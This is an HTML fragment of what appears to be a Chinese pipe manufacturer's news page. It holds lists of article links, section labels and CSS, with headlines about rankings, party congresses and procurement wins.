                    <div class="newTitle ">
                      <div class="newName ">
                        <a class="titleSet" href="/read/915.html" target="_self">· ...</a></div>
                    </div>
                  </div>
                </li>

              
                <li class="sumary_list modSet">
                  <div class="newCont">
                    <div class="newTitle ">
                      <div class="newName ">
                        <a class="titleSet" href="/read/914.html" target="_self">· ...</a></div>
                    </div>
                  </div>
                </li>

              
                <li class="sumary_list modSet">
                  <div class="newCont">
                    <div class="newTitle ">
                      <div class="newName ">
                        <a class="titleSet" href="/read/913.html" target="_self">· ...</a></div>
                    </div>
                  </div>
                </li>

              
                <li class="sumary_list modSet">
                  <div class="newCont">
                    <div class="newTitle ">
                      <div class="newName ">
                        <a class="titleSet" href="/read/911.html" target="_self">· ...</a></div>
                    </div>
                  </div>
                </li>

              
                <li class="sumary_list modSet">
                  <div class="newCont">
                    <div class="newTitle ">
                      <div class="newName ">
                        <a class="titleSet" href="/read/910.html" target="_self">· ...</a></div>
                    </div>
                  </div>
                </li>

              
                <li class="sumary_list modSet">
                  <div class="newCont">
                    <div class="newTitle ">
                      <div class="newName ">
                        <a class="titleSet" href="/read/899.html" target="_self">· ...</a></div>
                    </div>
                  </div>
                </li>

              
                <li class="sumary_list modSet">
                  <div class="newCont">
                    <div class="newTitle ">
                      <div class="newName ">
                        <a class="titleSet" href="/read/898.html" target="_self">· ...</a></div>
                    </div>
                  </div>
                </li>

              
                <li class="sumary_list modSet">
                  <div class="newCont">
                    <div class="newTitle ">
                      <div class="newName ">
                        <a class="titleSet" href="/read/897.html" target="_self">· ...</a></div>
                    </div>
                  </div>
                </li>

              
                <li class="sumary_list modSet">
                  <div class="newCont">
                    <div class="newTitle ">
                      <div class="newName ">
                        <a class="titleSet" href="/read/895.html" target="_self">· ...</a></div>
                    </div>
                  </div>
                </li>

              


              </ul>
            </div>
            <!--新闻列表区域 结束-->
            <style>#newsList_style_18_1556183214214 .newDetail.pc {display:block;} #newsList_style_18_1556183214214 .newDetail.pad, #newsList_style_18_1556183214214 .newDetail.mobile {display:none;} #newsList_style_18_1556183214214 .newTitle.pc {display:block;} #newsList_style_18_1556183214214 .newTitle.pad, #newsList_style_18_1556183214214 .newTitle.mobile {display:none;} @media screen and (min-width:641px) and (max-width:1200px) { #newsList_style_18_1556183214214 .newDetail.pad {display:block;} #newsList_style_18_1556183214214 .newDetail.pc, #newsList_style_18_1556183214214 .newDetail.mobile {display:none;} #newsList_style_18_1556183214214 .newTitle.pad {display:block;} #newsList_style_18_1556183214214 .newTitle.pc, #newsList_style_18_1556183214214 .newTitle.mobile {display:none;} } @media screen and (max-width:640px) { #newsList_style_18_1556183214214 .newDetail.mobile {display:block;} #newsList_style_18_1556183214214 .newDetail.pc, #newsList_style_18_1556183214214 .newDetail.pad {display:none;} #newsList_style_18_1556183214214 .newTitle.mobile {display:block;} #newsList_style_18_1556183214214 .newTitle.pc, #newsList_style_18_1556183214214 .newTitle.pad {display:none;} }</style>
            <style>@media screen and (min-width: 1025px) { #newsList_style_18_1556183214214 .sumary_list .newPic{width: 0px;} #newsList_style_18_1556183214214 .sumary_list .newCont{width: calc(100% - 0px - 10px);} #newsList_style_18_1556183214214 .sumary_list .newCont{width: 100%;} } @media screen and (min-width: 640px) and (max-width: 1024px) { #newsList_style_18_1556183214214 .sumary_list .newPic{width: 0px;} #newsList_style_18_1556183214214 .sumary_list .newCont{width: calc(100% - 0px - 10px);} #newsList_style_18_1556183214214 .sumary_list .newCont{width: 100%;} } @media screen and (max-width: 640px) { } /* 新分页 */ #newsList_style_18_1556183214214 .page_btn{ font-size:14px; text-align: center;} #newsList_style_18_1556183214214 .page_btn .all_page{ display:inline-block; margin:0 10px; } #newsList_style_18_1556183214214 .page:hover{ background:red; color:white; cursor:pointer;} #newsList_style_18_1556183214214 .page_btn .cur{ background:red; color:white; cursor:pointer;} #newsList_style_18_1556183214214 .submit_div{ display: inline-block; } #newsList_style_18_1556183214214 .page_btn input{ width:50px; margin:0 5px;} #newsList_style_18_1556183214214 .page_btn input:hover{ cursor:default; background:white; color:#333;} #newsList_style_18_1556183214214 .page_submit{margin-left:5px;} #newsList_style_18_1556183214214 .page{display:inline-block; border:none; background:white; text-align: center; width:auto; padding:0 15px; margin:0 .5px; height:auto; line-height:35px; box-sizing: border-box; -webkit-box-sizing: border-box; border:1px solid #e5e5e5;} @media screen and (max-width:640px) { #newsList_style_18_1556183214214 .page_btn{ font-size:12px; } #newsList_style_18_1556183214214 .submit_div{ display:none; } } #newsList_style_18_1556183214214 .page{width:auto; margin:0 5px 10px 5px; border-radius:5px; } @media screen and (max-width:640px) { #newsList_style_18_1556183214214 .page{line-height:30px; padding:0 13px;} }</style></div>
        </div>
        <div id="div_blank_new01_1556183229170" class="view blank_new01 div  none" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1">
          <div names="div" class="view_contents">
            <div class="blank_new01">
              <div class="roundcs modSet"></div>
            </div>
          </div>
        </div>
        <div id="text_style_01_1556183240057" class="view style_01 text  none lockHeightView" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1" style="">
          <div names="text" class="view_contents mkan" style="color:#fff;width: auto;padding: 0 5px">Party building</div></div>
        <div id="text_style_01_1556183250476" class="view style_01 text  none lockHeightView" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1">
          <div names="text" class="view_contents"><!-- State council --></div></div>
        <div id="newsList_style_18_1556184228352" class="view style_18 newsList  none lockHeightView" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1">
          <div names="newsList" class="view_contents">
            <!--新闻列表区域-->
            <!--pageSet pagecurSet-->
            <div class="boxNewsListStyle_18">
              <ul id="boxNewsList">


              
                <li class="sumary_list modSet">
                  <div class="newCont">
                    <div class="newTitle ">
                      <div class="newName ">
                        <a class="titleSet" href="/read/979.html" target="_self">· ...</a></div>
                    </div>
                  </div>
                </li>

              
                <li class="sumary_list modSet">
                  <div class="newCont">
                    <div class="newTitle ">
                      <div class="newName ">
                        <a class="titleSet" href="/read/978.html" target="_self">· ...</a></div>
                    </div>
                  </div>
                </li>

              
                <li class="sumary_list modSet">
                  <div class="newCont">
                    <div class="newTitle ">
                      <div class="newName ">
                        <a class="titleSet" href="/read/977.html" target="_self">· ...</a></div>
                    </div>
                  </div>
                </li>

              
                <li class="sumary_list modSet">
                  <div class="newCont">
                    <div class="newTitle ">
                      <div class="newName ">
                        <a class="titleSet" href="/read/976.html" target="_self">· ...</a></div>
                    </div>
                  </div>
                </li>

              
                <li class="sumary_list modSet">
                  <div class="newCont">
                    <div class="newTitle ">
                      <div class="newName ">
                        <a class="titleSet" href="/read/975.html" target="_self">· ...</a></div>
                    </div>
                  </div>
                </li>

              
                <li class="sumary_list modSet">
                  <div class="newCont">
                    <div class="newTitle ">
                      <div class="newName ">
                        <a class="titleSet" href="/read/974.html" target="_self">· ...</a></div>
                    </div>
                  </div>
                </li>

              
                <li class="sumary_list modSet">
                  <div class="newCont">
                    <div class="newTitle ">
                      <div class="newName ">
                        <a class="titleSet" href="/read/973.html" target="_self">· ...</a></div>
                    </div>
                  </div>
                </li>

              
                <li class="sumary_list modSet">
                  <div class="newCont">
                    <div class="newTitle ">
                      <div class="newName ">
                        <a class="titleSet" href="/read/972.html" target="_self">· ...</a></div>
                    </div>
                  </div>
                </li>

              
                <li class="sumary_list modSet">
                  <div class="newCont">
                    <div class="newTitle ">
                      <div class="newName ">
                        <a class="titleSet" href="/read/971.html" target="_self">· ...</a></div>
                    </div>
                  </div>
                </li>

              
                <li class="sumary_list modSet">
                  <div class="newCont">
                    <div class="newTitle ">
                      <div class="newName ">
                        <a class="titleSet" href="/read/970.html" target="_self">· ...</a></div>
                    </div>
                  </div>
                </li>

              
                <li class="sumary_list modSet">
                  <div class="newCont">
                    <div class="newTitle ">
                      <div class="newName ">
                        <a class="titleSet" href="/read/969.html" target="_self">· ...</a></div>
                    </div>
                  </div>
                </li>

              

              </ul>
            </div>
            <!--新闻列表区域 结束-->
            <style>#newsList_style_18_1556184228352 .newDetail.pc {display:block;} #newsList_style_18_1556184228352 .newDetail.pad, #newsList_style_18_1556184228352 .newDetail.mobile {display:none;} #newsList_style_18_1556184228352 .newTitle.pc {display:block;} #newsList_style_18_1556184228352 .newTitle.pad, #newsList_style_18_1556184228352 .newTitle.mobile {display:none;} @media screen and (min-width:641px) and (max-width:1200px) { #newsList_style_18_1556184228352 .newDetail.pad {display:block;} #newsList_style_18_1556184228352 .newDetail.pc, #newsList_style_18_1556184228352 .newDetail.mobile {display:none;} #newsList_style_18_1556184228352 .newTitle.pad {display:block;} #newsList_style_18_1556184228352 .newTitle.pc, #newsList_style_18_1556184228352 .newTitle.mobile {display:none;} } @media screen and (max-width:640px) { #newsList_style_18_1556184228352 .newDetail.mobile {display:block;} #newsList_style_18_1556184228352 .newDetail.pc, #newsList_style_18_1556184228352 .newDetail.pad {display:none;} #newsList_style_18_1556184228352 .newTitle.mobile {display:block;} #newsList_style_18_1556184228352 .newTitle.pc, #newsList_style_18_1556184228352 .newTitle.pad {display:none;} }</style>
            <style>@media screen and (min-width: 1025px) { #newsList_style_18_1556184228352 .sumary_list .newPic{width: 0px;} #newsList_style_18_1556184228352 .sumary_list .newCont{width: calc(100% - 0px - 10px);} #newsList_style_18_1556184228352 .sumary_list .newCont{width: 100%;} } @media screen and (min-width: 640px) and (max-width: 1024px) { #newsList_style_18_1556184228352 .sumary_list .newPic{width: 0px;} #newsList_style_18_1556184228352 .sumary_list .newCont{width: calc(100% - 0px - 10px);} #newsList_style_18_1556184228352 .sumary_list .newCont{width: 100%;} } @media screen and (max-width: 640px) { } /* 新分页 */ #newsList_style_18_1556184228352 .page_btn{ font-size:14px; text-align: center;} #newsList_style_18_1556184228352 .page_btn .all_page{ display:inline-block; margin:0 10px; } #newsList_style_18_1556184228352 .page:hover{ background:red; color:white; cursor:pointer;} #newsList_style_18_1556184228352 .page_btn .cur{ background:red; color:white; cursor:pointer;} #newsList_style_18_1556184228352 .submit_div{ display: inline-block; } #newsList_style_18_1556184228352 .page_btn input{ width:50px; margin:0 5px;} #newsList_style_18_1556184228352 .page_btn input:hover{ cursor:default; background:white; color:#333;} #newsList_style_18_1556184228352 .page_submit{margin-left:5px;} #newsList_style_18_1556184228352 .page{display:inline-block; border:none; background:white; text-align: center; width:auto; padding:0 15px; margin:0 .5px; height:auto; line-height:35px; box-sizing: border-box; -webkit-box-sizing: border-box; border:1px solid #e5e5e5;} @media screen and (max-width:640px) { #newsList_style_18_1556184228352 .page_btn{ font-size:12px; } #newsList_style_18_1556184228352 .submit_div{ display:none; } } #newsList_style_18_1556184228352 .page{width:auto; margin:0 5px 10px 5px; border-radius:5px; } @media screen and (max-width:640px) { #newsList_style_18_1556184228352 .page{line-height:30px; padding:0 13px;} }</style></div>
        </div>
        <div id="div_blank_new01_1556184211783" class="view blank_new01 div  none" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1">
          <div names="div" class="view_contents">
            <div class="blank_new01">
              <div class="roundcs modSet"></div>
            </div>
          </div>
        </div>
        <div id="text_style_01_1556184474675" class="view style_01 text  none lockHeightView" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1">
          <div names="text" class="view_contents mkan" style="color:#fff; width: auto;padding: 0 5px">Stock news</div></div>
        <div id="text_style_01_1556184511596" class="view style_01 text  none lockHeightView" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1">
          <div names="text" class="view_contents"><!-- Related business --></div></div>
        <div id="div_blank_new01_1561907092331" class="view blank_new01 div  none" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1">
          <div names="div" class="view_contents">
            <div class="blank_new01">
              <div class="roundcs modSet"></div>
            </div>
          </div>
        </div>
        <div id="div_blank_new01_1561907161241" class="view blank_new01 div  none" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1">
          <div names="div" class="view_contents">
            <div class="blank_new01">
              <div class="roundcs modSet"></div>
            </div>
          </div>
        </div>
        <div id="text_style_01_1556184343774" class="view style_01 text  none lockHeightView" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1">
          <div names="text" class="view_contents mkan" style="color:#fff; width: auto;padding: 0 5px">Group news</div></div>
        <div id="text_style_01_1556184417891" class="view style_01 text  none lockHeightView" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1">
          <div names="text" class="view_contents"><!-- Group news --></div></div>
        <div id="div_a_includeBlock_1565354244604" class="view a_includeBlock div  none includeView" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1">
          <div names="div" class="view_contents">

              
            <div id="text_style_01_1565354279225" class="view style_01 text  none lockHeightView" data-wow-duration="0s" data-wow-delay="555555555550s" data-wow-offset="0" data-wow-iteration="1">
              <div names="text" class="view_contents">
                <a href="/read/963.html" target="" style="color:inherit" class="editor-view-extend link-type-3-" title="【股份新闻】2025年《财富》中国500强排行榜揭晓，新兴铸管上榜！">· ...</a></div>
            </div>


              
            <div id="text_style_01_1565354279225" class="view style_01 text  none lockHeightView" data-wow-duration="0s" data-wow-delay="555555555550s" data-wow-offset="0" data-wow-iteration="1">
              <div names="text" class="view_contents">
                <a href="/read/962.html" target="" style="color:inherit" class="editor-view-extend link-type-3-" title="【股份新闻】铸管股份第五次党代会胜利闭幕 何齐书主持大会并发表讲话">· ...</a></div>
            </div>


              
            <div id="text_style_01_1565354279225" class="view style_01 text  none lockHeightView" data-wow-duration="0s" data-wow-delay="555555555550s" data-wow-offset="0" data-wow-iteration="1">
              <div names="text" class="view_contents">
                <a href="/read/961.html" target="" style="color:inherit" class="editor-view-extend link-type-3-" title="【股份新闻】铸管股份第五次党代会隆重开幕 何齐书作工作报告">· ...</a></div>
            </div>


              
            <div id="text_style_01_1565354279225" class="view style_01 text  none lockHeightView" data-wow-duration="0s" data-wow-delay="555555555550s" data-wow-offset="0" data-wow-iteration="1">
              <div names="text" class="view_contents">
                <a href="/read/960.html" target="" style="color:inherit" class="editor-view-extend link-type-3-" title="【股份新闻】915.75亿元，品牌再创新高！新兴铸管荣膺2025年“中国500最具价值品牌”">· ...</a></div>
            </div>


              
            <div id="text_style_01_1565354279225" class="view style_01 text  none lockHeightView" data-wow-duration="0s" data-wow-delay="555555555550s" data-wow-offset="0" data-wow-iteration="1">
              <div names="text" class="view_contents">
                <a href="/read/959.html" target="" style="color:inherit" class="editor-view-extend link-type-3-" title="【股份新闻】铸管股份参加2025年中国水博览会">· ...</a></div>
            </div>


              
            <div id="text_style_01_1565354279225" class="view style_01 text  none lockHeightView" data-wow-duration="0s" data-wow-delay="555555555550s" data-wow-offset="0" data-wow-iteration="1">
              <div names="text" class="view_contents">
                <a href="/read/835.html" target="" style="color:inherit" class="editor-view-extend link-type-3-" title="【股份新闻】优秀！新兴铸管入选京津冀企业百强、京津冀制造业企业百强！">· ...</a></div>
            </div>


              
            <div id="text_style_01_1565354279225" class="view style_01 text  none lockHeightView" data-wow-duration="0s" data-wow-delay="555555555550s" data-wow-offset="0" data-wow-iteration="1">
              <div names="text" class="view_contents">
                <a href="/read/792.html" target="" style="color:inherit" class="editor-view-extend link-type-3-" title="【股份新闻】新兴铸管中标长江环保项目首个球墨铸铁管集中采购">· ...</a></div>
            </div>


              
            <div id="text_style_01_1565354279225" class="view style_01 text  none lockHeightView" data-wow-duration="0s" data-wow-delay="555555555550s" data-wow-offset="0" data-wow-iteration="1">
              <div names="text" class="view_contents">
                <a href="/read/791.html" target="" style="color:inherit" class="editor-view-extend link-type-3-" title="【股份新闻】蝉联九年 | 新兴铸管再次入围亚洲品牌500强">· ...</a></div>
            </div>


              
            <div id="text_style_01_1565354279225" class="view style_01 text  none lockHeightView" data-wow-duration="0s" data-wow-delay="555555555550s" data-wow-offset="0" data-wow-iteration="1">
              <div names="text" class="view_contents">
                <a href="/read/790.html" target="" style="color:inherit" class="editor-view-extend link-type-3-" title="【股份新闻】第五届“一带一路”百国印记短视频大赛精彩落幕 | 新兴铸管获“一带一路”最美共建者">· ...</a></div>
            </div>


              
            <div id="text_style_01_1565354279225" class="view style_01 text  none lockHeightView" data-wow-duration="0s" data-wow-delay="555555555550s" data-wow-offset="0" data-wow-iteration="1">
              <div names="text" class="view_contents">
                <a href="/read/789.html" target="" style="color:inherit" class="editor-view-extend link-type-3-" title="【股份新闻】铸管股份：坚持学深悟透，把理论学习成果转化为推动工作、指导实践的强大力量">· ...</a></div>
            </div>


              
            <div id="text_style_01_1565354279225" class="view style_01 text  none lockHeightView" data-wow-duration="0s" data-wow-delay="555555555550s" data-wow-offset="0" data-wow-iteration="1">
              <div names="text" class="view_contents">
                <a href="/read/786.html" target="" style="color:inherit" class="editor-view-extend link-type-3-" title="【股份新闻】主题教育 | 调研破难题 研讨在一线 铸管股份党委以调查研究促进企业高质量发展">· ...</a></div>
            </div>


              


          </div>
        </div>
      </div>
    </div>
    <div id="layout_1563951323750" class="layout  none" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1">
      <div class="view_contents">
        <div id="image_style_01_1563951769674" class="view style_01 image  none" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1">
          <div names="image" class="view_contents">
            <div class="imgStyle CompatibleImg">
              <a href="javascript:;" target="">
                <img class="picSet link-type-" src="/static/index/20190724150313259.jpg" title="" alt="描述" id="imageModeShow"></a>
            </div>
            <!-- 新加的js --></div>
        </div>
        <div id="text_style_01_1563951806074" class="view style_01 text  none lockHeightView" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1">
          <div names="text" class="view_contents">和衷共济 · 同心致远</div></div>
        <div id="text_style_01_1563952084073" class="view style_01 text  none lockHeightView" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1">
          <div names="text" class="view_contents">COOPERATE WISH EACH OTHER · CONCENTRIC</div></div>
      </div>
    </div>
    <div id="layout_1556185436125" class="layout  none" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1">
      <div class="view_contents"></div>
    </div>
    <div id="layout_1556185286151" class="layout  none" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1">
      <div class="view_contents">
        <div id="div_a_includeBlock_1556185416108" class="view a_includeBlock div  none includeView" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1">
          <div names="div" class="view_contents">
            <div id="text_style_01_1556185547854" class="view style_01 text  none lockHeightView mkbj" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1" style="color:#fff;width: auto;padding: 0 5px">
              <div names="text" class="view_contents mkan" style="color:#fff; width: auto ; padding: 0 5px" >Information</div></div>

            <div id="text_style_01_1556185581256" class="view style_01 text  none lockHeightView" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1">
              <div names="text" class="view_contents"><!-- Industry news --></div></div>
            <div id="newsList_style_18_1561899204433" class="view style_18 newsList  none lockHeightView" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1">
              <div names="newsList" class="view_contents">
                <!--新闻列表区域-->
                <!--pageSet pagecurSet-->
                <div class="boxNewsListStyle_18">
                  <ul id="boxNewsList">

              
                    <li class="sumary_list modSet">
                      <div class="newCont">
                        <div class="newTitle ">
                          <div class="newName ">
                            <a class="titleSet" href="/read/936.html" target="_self">· ...</a></div>
                        </div>
                      </div>
                    </li>


              
                    <li class="sumary_list modSet">
                      <div class="newCont">
                        <div class="newTitle ">
                          <div class="newName ">
                            <a class="titleSet" href="/read/930.html" target="_self">· ...</a></div>
                        </div>
                      </div>
                    </li>


              
                    <li class="sumary_list modSet">
                      <div class="newCont">
                        <div class="newTitle ">
                          <div class="newName ">
                            <a class="titleSet" href="/read/809.html" target="_self">· ...</a></div>
                        </div>
                      </div>
                    </li>


              
                    <li class="sumary_list modSet">
                      <div class="newCont">
                        <div class="newTitle ">
                          <div class="newName ">
                            <a class="titleSet" href="/read/743.html" target="_self">· ...</a></div>
                        </div>
                      </div>
                    </li>


              
                    <li class="sumary_list modSet">
                      <div class="newCont">
                        <div class="newTitle ">
                          <div class="newName ">
                            <a class="titleSet" href="/read/738.html" target="_self">· ...</a></div>
                        </div>
                      </div>
                    </li>


              
                    <li class="sumary_list modSet">
                      <div class="newCont">
                        <div class="newTitle ">
                          <div class="newName ">
                            <a class="titleSet" href="/read/721.html" target="_self">· ...</a></div>
                        </div>
                      </div>
                    </li>


              
                    <li class="sumary_list modSet">
                      <div class="newCont">
                        <div class="newTitle ">
                          <div class="newName ">
                            <a class="titleSet" href="/read/719.html" target="_self">· ...</a></div>
                        </div>
                      </div>
                    </li>


              
                    <li class="sumary_list modSet">
                      <div class="newCont">
                        <div class="newTitle ">
                          <div class="newName ">
                            <a class="titleSet" href="/read/691.html" target="_self">· ...</a></div>
                        </div>
                      </div>
                    </li>


              
                    <li class="sumary_list modSet">
                      <div class="newCont">
                        <div class="newTitle ">
                          <div class="newName ">
                            <a class="titleSet" href="/read/689.html" target="_self">· ...</a></div>
                        </div>
                      </div>
                    </li>


              
                    <li class="sumary_list modSet">
                      <div class="newCont">
                        <div class="newTitle ">
                          <div class="newName ">
                            <a class="titleSet" href="/read/688.html" target="_self">· ...</a></div>
                        </div>
                      </div>
                    </li>


              
                    <li class="sumary_list modSet">
                      <div class="newCont">
                        <div class="newTitle ">
                          <div class="newName ">
                            <a class="titleSet" href="/read/682.html" target="_self">· ...</a></div>
                        </div>
                      </div>
                    </li>


              

                  </ul>
                </div>
                <!--新闻列表区域 结束-->
                <style>#newsList_style_18_1561899204433 .newDetail.pc {display:block;} #newsList_style_18_1561899204433 .newDetail.pad, #newsList_style_18_1561899204433 .newDetail.mobile {display:none;} #newsList_style_18_1561899204433 .newTitle.pc {display:block;} #newsList_style_18_1561899204433 .newTitle.pad, #newsList_style_18_1561899204433 .newTitle.mobile {display:none;} @media screen and (min-width:641px) and (max-width:1200px) { #newsList_style_18_1561899204433 .newDetail.pad {display:block;} #newsList_style_18_1561899204433 .newDetail.pc, #newsList_style_18_1561899204433 .newDetail.mobile {display:none;} #newsList_style_18_1561899204433 .newTitle.pad {display:block;} #newsList_style_18_1561899204433 .newTitle.pc, #newsList_style_18_1561899204433 .newTitle.mobile {display:none;} } @media screen and (max-width:640px) { #newsList_style_18_1561899204433 .newDetail.mobile {display:block;} #newsList_style_18_1561899204433 .newDetail.pc, #newsList_style_18_1561899204433 .newDetail.pad {display:none;} #newsList_style_18_1561899204433 .newTitle.mobile {display:block;} #newsList_style_18_1561899204433 .newTitle.pc, #newsList_style_18_1561899204433 .newTitle.pad {display:none;} }</style>
                <style>@media screen and (min-width: 1025px) { #newsList_style_18_1561899204433 .sumary_list .newPic{width: 0px;} #newsList_style_18_1561899204433 .sumary_list .newCont{width: calc(100% - 0px - 10px);} #newsList_style_18_1561899204433 .sumary_list .newCont{width: 100%;} } @media screen and (min-width: 640px) and (max-width: 1024px) { #newsList_style_18_1561899204433 .sumary_list .newPic{width: 0px;} #newsList_style_18_1561899204433 .sumary_list .newCont{width: calc(100% - 0px - 10px);} #newsList_style_18_1561899204433 .sumary_list .newCont{width: 100%;} } @media screen and (max-width: 640px) { } /* 新分页 */ #newsList_style_18_1561899204433 .page_btn{ font-size:14px; text-align: center;} #newsList_style_18_1561899204433 .page_btn .all_page{ display:inline-block; margin:0 10px; } #newsList_style_18_1561899204433 .page:hover{ background:red; color:white; cursor:pointer;} #newsList_style_18_1561899204433 .page_btn .cur{ background:red; color:white; cursor:pointer;} #newsList_style_18_1561899204433 .submit_div{ display: inline-block; } #newsList_style_18_1561899204433 .page_btn input{ width:50px; margin:0 5px;} #newsList_style_18_1561899204433 .page_btn input:hover{ cursor:default; background:white; color:#333;} #newsList_style_18_1561899204433 .page_submit{margin-left:5px;} #newsList_style_18_1561899204433 .page{display:inline-block; border:none; background:white; text-align: center; width:auto; padding:0 15px; margin:0 .5px; height:auto; line-height:35px; box-sizing: border-box; -webkit-box-sizing: border-box; border:1px solid #e5e5e5;} @media screen and (max-width:640px) { #newsList_style_18_1561899204433 .page_btn{ font-size:12px; } #newsList_style_18_1561899204433 .submit_div{ display:none; } } #newsList_style_18_1561899204433 .page{width:auto; margin:0 5px 10px 5px; border-radius:5px; } @media screen and (max-width:640px) { #newsList_style_18_1561899204433 .page{line-height:30px; padding:0 13px;} }</style></div>
            </div>
            <div id="div_blank_new01_1561907240853" class="view blank_new01 div  none" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1">
              <div names="div" class="view_contents">
                <div class="blank_new01">
                  <div class="roundcs modSet"></div>
                </div>
              </div>
            </div>
          </div>
        </div>
        <div id="div_a_includeBlock_1556186636280" class="view a_includeBlock div  none includeView" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1">
          <div names="div" class="view_contents">
            <div id="text_style_01_1556186636375" class="view style_01 text  none lockHeightView" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1" style="color:#fff;width: auto;padding: 0 5px">
              <div names="text" class="view_contents mkan" style="color:#fff;width: auto;padding: 0 5px">Grassroots dynamics</div></div>
            <div id="text_style_01_1556186636378" class="view style_01 text  none lockHeightView" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1">
              <div names="text" class="view_contents"><!-- Grassroots dynamics --></div></div>
            <div id="newsList_style_18_1561899198569" class="view style_18 newsList  none lockHeightView" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1">
              <div names="newsList" class="view_contents">
                <!--新闻列表区域-->
                <!--pageSet pagecurSet-->
                <div class="boxNewsListStyle_18">
                  <ul id="boxNewsList">

              
                    <li class="sumary_list modSet">
                      <div class="newCont">
                        <div class="newTitle ">
                          <div class="newName ">
                            <a class="titleSet" href="/read/929.html" target="_self">· ...</a></div>
                        </div>
                      </div>
                    </li>

              
                    <li class="sumary_list modSet">
                      <div class="newCont">
                        <div class="newTitle ">
                          <div class="newName ">
                            <a class="titleSet" href="/read/926.html" target="_self">· ...</a></div>
                        </div>
                      </div>
                    </li>

              
                    <li class="sumary_list modSet">
                      <div class="newCont">
                        <div class="newTitle ">
                          <div class="newName ">
                            <a class="titleSet" href="/read/925.html" target="_self">· ...</a></div>
                        </div>
                      </div>
                    </li>

              
                    <li class="sumary_list modSet">
                      <div class="newCont">
                        <div class="newTitle ">
                          <div class="newName ">
                            <a class="titleSet" href="/read/924.html" target="_self">· ...</a></div>
                        </div>
                      </div>
                    </li>

              
                    <li class="sumary_list modSet">
                      <div class="newCont">
                        <div class="newTitle ">
                          <div class="newName ">
                            <a class="titleSet" href="/read/916.html" target="_self">· ...</a></div>
                        </div>
                      </div>
                    </li>

              
                    <li class="sumary_list modSet">
                      <div class="newCont">
                        <div class="newTitle ">
                          <div class="newName ">
                            <a class="titleSet" href="/read/909.html" target="_self">· ...</a></div>
                        </div>
                      </div>
                    </li>

              
                    <li class="sumary_list modSet">
                      <div class="newCont">
                        <div class="newTitle ">
                          <div class="newName ">
                            <a class="titleSet" href="/read/904.html" target="_self">· ...</a></div>
                        </div>
                      </div>
                    </li>

              
                    <li class="sumary_list modSet">
                      <div class="newCont">
                        <div class="newTitle ">
                          <div class="newName ">
                            <a class="titleSet" href="/read/901.html" target="_self">· ...</a></div>
                        </div>
                      </div>
                    </li>

              
                    <li class="sumary_list modSet">
                      <div class="newCont">
                        <div class="newTitle ">
                          <div class="newName ">
                            <a class="titleSet" href="/read/891.html" target="_self">· ...</a></div>
                        </div>
                      </div>
                    </li>

              
                    <li class="sumary_list modSet">
                      <div class="newCont">
                        <div class="newTitle ">
                          <div class="newName ">
                            <a class="titleSet" href="/read/890.html" target="_self">· ...</a></div>
                        </div>
                      </div>
                    </li>

              
                    <li class="sumary_list modSet">
                      <div class="newCont">
                        <div class="newTitle ">
                          <div class="newName ">
                            <a class="titleSet" href="/read/862.html" target="_self">· ...</a></div>
                        </div>
                      </div>
                    </li>

              

                  </ul>
                </div>
                <!--新闻列表区域 结束-->
                <style>#newsList_style_18_1561899198569 .newDetail.pc {display:block;} #newsList_style_18_1561899198569 .newDetail.pad, #newsList_style_18_1561899198569 .newDetail.mobile {display:none;} #newsList_style_18_1561899198569 .newTitle.pc {display:block;} #newsList_style_18_1561899198569 .newTitle.pad, #newsList_style_18_1561899198569 .newTitle.mobile {display:none;} @media screen and (min-width:641px) and (max-width:1200px) { #newsList_style_18_1561899198569 .newDetail.pad {display:block;} #newsList_style_18_1561899198569 .newDetail.pc, #newsList_style_18_1561899198569 .newDetail.mobile {display:none;} #newsList_style_18_1561899198569 .newTitle.pad {display:block;} #newsList_style_18_1561899198569 .newTitle.pc, #newsList_style_18_1561899198569 .newTitle.mobile {display:none;} } @media screen and (max-width:640px) { #newsList_style_18_1561899198569 .newDetail.mobile {display:block;} #newsList_style_18_1561899198569 .newDetail.pc, #newsList_style_18_1561899198569 .newDetail.pad {display:none;} #newsList_style_18_1561899198569 .newTitle.mobile {display:block;} #newsList_style_18_1561899198569 .newTitle.pc, #newsList_style_18_1561899198569 .newTitle.pad {display:none;} }</style>
